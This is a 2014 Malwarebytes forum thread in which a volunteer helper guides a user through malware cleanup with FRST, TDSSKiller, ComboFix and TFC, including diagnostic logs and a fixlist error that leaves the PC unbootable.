UpdatusUser (S-1-5-21-2032665127-3746338806-4175205368-1000 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Faulty Device Manager Devices =============

Name: Control Vault w/ Fingerprint Swipe Sensor
Description: Control Vault w/ Fingerprint Swipe Sensor
Class Guid: {53d29ef7-377c-4d14-864b-eb3a85769359}
Manufacturer: Broadcom Corporation
Service: WUDFRd
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation.

Name: Broadcom Usbccid Smartcard Reader (WUDF)
Description: Broadcom Usbccid Smartcard Reader (WUDF)
Class Guid: {50dd5230-ba8a-11d1-bf5d-0000f805f530}
Manufacturer: Broadcom
Service: WUDFRd
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation.

==================== Event log errors: =========================

Application errors:
==================
Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_RpcEptMapper, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: rpcss.dll, version: 6.1.7601.17514, time stamp: 0x4ce7c970
Exception code: 0xc0000005
Fault offset: 0x00000000000646ac
Faulting process id: 0x3cc
Faulting application start time: 0xsvchost.exe_RpcEptMapper0
Faulting application path: svchost.exe_RpcEptMapper1
Faulting module path: svchost.exe_RpcEptMapper2
Report Id: svchost.exe_RpcEptMapper3

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4134

System errors:
=============
Error: (11/04/2014 09:43:14 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/04/2014 09:42:43 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: ADC1104)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/04/2014 09:23:58 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: The handle is invalid.Broadcom Corp Contacted SmartCard 0GET_STATEXX XX XX XX

Error: (11/04/2014 09:08:35 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The WvPCR service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The SI TSS v1.2.1.41 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (11/04/2014 09:08:07 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain ADC1104 due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.

ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Remote Procedure Call (RPC) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Reboot the machine.

Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The RPC Endpoint Mapper service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.

Error: (11/04/2014 09:00:01 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows attempted to read the file \\adc.com\SysVol\adc.com\Policies\{97A64E57-5354-4D99-8398-66406F78FA5A}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Microsoft Office Sessions:
=========================
Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: )
Description:

Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe_RpcEptMapper6.1.7600.163854a5bc3c1rpcss.dll6.1.7601.175144ce7c970c000000500000000000646ac3cc01cff7ae99170b7eC:\Windows\system32\svchost.exec:\windows\system32\rpcss.dll6e65f048-642b-11e4-a9a8-b8ca3ad1aa18

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4134

==================== Memory info ===========================

Processor: Intel® Core i5-3320M CPU @ 2.60GHz
Percentage of memory in use: 70%
Total physical RAM: 6015.18 MB
Available physical RAM: 1766.91 MB
Total Pagefile: 12028.55 MB
Available Pagefile: 7572.97 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:118.46 GB) (Free:49.89 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 119.2 GB) (Disk ID: D7B04F5B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=752 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=118.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================

plaggard · November 4, 2014

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/4/2014
Scan Time: 10:08:31 AM
Logfile: MBAMlog.txt
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.11.04.03
Rootkit Database: v2014.11.01.02
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: bcostello

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 559493
Time Elapsed: 5 min, 42 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

MrCharlie · November 4, 2014

Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait

The tool will create a log (Fixlog.txt) in the folder, please post it to your reply.

==============================

If rpcss.dll comes up in the scan, please allow TDSSKiller to fix it.

Make sure you have created that system restore point before you continue!

Please read the directions carefully so you don't end up deleting something that is good!!

If in doubt about an entry....please ask or choose Skip!!!!

Don't Delete anything unless instructed to!

If you get the warning about a file UnsignedFile.Multi.Generic or LockedFile.Multi.Generic please choose

Skip and click on Continue

If a suspicious object is detected, the default action will be Skip, click on Continue

Please note that TDSSKiller can be run in safe mode if needed.

Please download the latest version of TDSSKiller from HERE and save it to your Desktop.

Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters. (Leave the KSN box checked)
Put a checkmark beside loaded modules.
A reboot will be needed to apply the changes. Do it.
TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
Then click on Change parameters in TDSSKiller.
Check all boxes then click OK.
Click the Start Scan button.
The scan should take no longer than 2 minutes.
If a suspicious object is detected, the default action will be Skip, click on Continue.

Any entries like this: \Device\Harddisk0\DR0 ( TDSS File System ) - please choose Skip.
If in doubt about an entry....please ask or choose Skip
If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here. There may be 3 logs > so post or attach all of them.
Sometimes these logs can be very large, in that case please attach it or zip it up and attach it.

Here's a summary of what to do if you would like to print it out:

If in doubt about an entry....please ask or choose Skip

Don't Delete anything unless instructed to!

If a suspicious object is detected, the default action will be Skip, click on Continue

If you get the warning about a file UnsignedFile.Multi.Generic or LockedFile.Multi.Generic please choose

Skip and click on Continue

Any entries like this: \Device\Harddisk0\DR0 ( TDSS File System ) - please choose Skip.

If malicious objects are found, they will show in the Scan results and offer three (3) options.

Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.

Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.

~~~~~~~~~~~~~~~~~~~~

You can attach the logs if they're too long:

Bottom right corner of this page.

New window that comes up.

Then...........

Please download and run ComboFix.

The most important things to remember when running it is to disable all your malware programs and run Combofix from your desktop.

Please visit this webpage for download links, and instructions for running ComboFix

http://www.bleepingcomputer.com/combofix/how-to-use-combofix

http://www.bleepingcomputer.com/download/combofix/dl/12/ <---ComboFix direct download

Please make sure you click download buttons that look similar to this, not "sponsored ad links":

Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Information on disabling your malware programs can be found Here.

Make sure you run ComboFix from your desktop.

Give it at least 30-45 minutes to finish if needed.

Please include the C:\ComboFix.txt in your next reply for further review.

---------->NOTE<----------

If you get the message Illegal operation attempted on registry key that has been marked for deletion after you run ComboFix....please reboot the computer, this should resolve the problem. You may have to do this several times if needed.

=======================

Clean out temp files:

Download TFC from here and save it to your desktop.

http://oldtimer.geekstogo.com/TFC.exe

http://www.bleepingcomputer.com/download/tfc/dl/92/

Close any open programs and Internet browsers.

Double click TFC.exe to run it on XP (for Vista and Windows 7 right click and choose "Run as administrator") and once it opens click on the Start button on the lower left of the program to allow it to begin cleaning.

Please be patient as clearing out temp files may take a while.

Once it completes you may be prompted to restart your computer, please do so.

Once it's finished you may delete TFC.exe from your desktop or save it for later use for the cleaning of temporary files.

MrC

plaggard · November 4, 2014

Thanks MrC. Here's that fixlog

Fixlog.txt

MrCharlie · November 4, 2014

I just noticed a file in the fixlist that shouldn't have been there and will probably prevent the computer from booting up.

Using system restore should correct it, if not......

Get back to me if that's the case.

MrC

plaggard · November 4, 2014

That is the case. Restarting has brought me to the black screen of death. I'll reboot and do a system restore now (just created one a few minutes ago).

MrCharlie · November 4, 2014

OK, let me know.

MrC

plaggard · November 4, 2014

I had to restore to a point from yesterday because the one from today had that file in it and brought me right back to the BkSOD...

So now I'm back to yesterday.

MrCharlie · November 4, 2014

OK..sorry about that.

You can go back and start here again, I fixed the fixlist.txt so you won't have any problems this time.

https://forums.malwarebytes.org/index.php?/topic/160219-flooded-with-dllhostexe-32-com-surrogate/?p=902444

MrC

plaggard · November 4, 2014

No need to apologize! It was probably my fault some way or another.

Here's the new Fixlog.

Should I restart the computer like it's asking me to?

Fixlog.txt

MrCharlie · November 4, 2014

Don't restart it YET!

Let me know when you're back.

MrC

plaggard · November 4, 2014

Sorry, I followed your initial instruction and restarted it. Got the black screen again and did a restore. Then restarted again and the login screen came up just fine...

MrCharlie · November 4, 2014

Good, continue on with the rest of it, MrC

plaggard · November 5, 2014

Hey MrC, in the middle of the MalwareBytes threat scan my computer restarted unexpectedly and now I am in an endless "Startup Repair" loop. The OS will not load and the installation disc's repair utilities will not repair the computer. It won't even restore from any of my previous restore points. The best I can do is run command prompt from the disc. Unless you have advice for this situation, I'm going to have to get this sorted out before we continue...

MrCharlie · November 5, 2014

On a clean machine, please download Farbar Recovery Scan Tool and save it to a flash drive.
Note: You need to run the version compatible with your system.
Plug the flashdrive into the infected PC.
If you are using Windows 8 consult How to use the Windows 8 System Recovery Environment Command Prompt to enter System Recovery Command prompt.
If you are using Vista or Windows 7 enter System Recovery Options.
To enter System Recovery Options from the Advanced Boot Options:
- Restart the computer.
- As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
- Use the arrow keys to select the Repair your computer menu item.
- Select US as the keyboard language settings, and then click Next.
- Select the operating system you want to repair, and then click Next.
- Select your user account an click Next.
Note: In case you can not enter System Recovery Options by using F8 method, you can use Windows installation disc, or make a repair disc. Any Windows installation disc or a repair disc made on another computer can be used.
To make a repair disk on Windows 7 consult: http://www.sevenforums.com/tutorials/2083-system-repair-disc-create.html
To enter System Recovery Options by using Windows installation disc:
- Insert the installation disc.
- Restart your computer.
- If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
- Click Repair your computer.
- Select US as the keyboard language settings, and then click Next.
- Select the operating system you want to repair, and then click Next.
- Select your user account and click Next.
On the System Recovery Options menu you will get the following options:
Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt
Select Command Prompt
Once in the Command Prompt:
- In the command window type in notepad and press Enter.
- The notepad opens. Under File menu select Open.
- Select "Computer" and find your flash drive letter and close the notepad.
- In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
  Note: Replace letter e with the drive letter of your flash drive.
- The tool will start to run.
- When the tool opens click Yes to disclaimer.
- Press Scan button.
- It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
MrC

AdvancedSetup · November 30, 2014

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Flooded with dllhost.exe *32 (COM Surrogate)

Recommended Posts

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Recently Browsing 0 members

Important Information